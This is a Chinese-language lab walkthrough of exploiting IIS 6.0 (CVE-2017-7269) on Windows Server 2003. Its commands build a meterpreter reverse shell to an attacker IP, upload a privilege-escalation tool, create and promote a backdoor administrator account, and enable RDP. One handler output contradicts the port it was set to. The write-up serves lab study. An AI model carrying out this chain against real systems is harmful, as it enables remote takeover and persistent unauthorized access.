IIS6.0遠程代碼執行漏洞復現(CVE-2017-7269)

提權文件下載:點此下載
靶機：Windows server 2003 r2
EXP：https://github.com/zcgonvh/cve-2017-7269
把EXP導入Metasploit

啓動MSF

嘗試加載攻擊模塊
發現找不到該模塊，這是因爲msf不識別-，把-改爲下劃線就好了

重新啓動程序

成功加載攻擊模塊

查看需要設置的參數

設置參數

加載攻擊載荷

開始攻擊

攻擊成功

生成payload

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.136 LPORT=6666 -f exe -o system.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: system.exe

嘗試提權
測試得知根目錄具有寫權限

上傳提權文件

meterpreter > upload "/root/pr.exe" c:\\shell
[*] uploading  : /root/pr.exe -> c:\shell
[*] uploaded   : /root/pr.exe -> c:\shell\pr.exe
meterpreter > upload "/root/system.exe" c:\\shell
[*] uploading  : /root/system.exe -> c:\shell
[*] uploaded   : /root/system.exe -> c:\shell\system.exe
meterpreter >

開啓一個msfconsole並進入監聽狀態

sf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.52.136
lhost => 192.168.52.136
msf5 exploit(multi/handler) > set lport 6666
lport => 6988
msf5 exploit(multi/handler) > exploit 

執行提權程序

成功獲取到一個shell

得到最高權限

使用以下命令開啓3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

關閉3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

使用netstat -an查看是否開啓

添加管理員賬號

C:\shell>pr.exe "net user hack !123 /add"
pr.exe "net user hack !123 /add"
/xxoo/-->Build&&Change By p 
/xxoo/-->This exploit gives you a Local System shell 
/xxoo/-->Got WMI process Pid: 1796 
begin to try
/xxoo/-->Found token SYSTEM 
/xxoo/-->Command:net user hack !123 /add

添加到管理組

C:\shell>pr.exe "net localgroup administrators hack /add"
pr.exe "net localgroup administrators hack /add"
/xxoo/-->Build&&Change By p 
/xxoo/-->This exploit gives you a Local System shell 
/xxoo/-->Got WMI process Pid: 1796 
begin to try
/xxoo/-->Found token SYSTEM 
/xxoo/-->Command:net localgroup administrators hack /add
命令成功完成。

啓動遠程桌面連接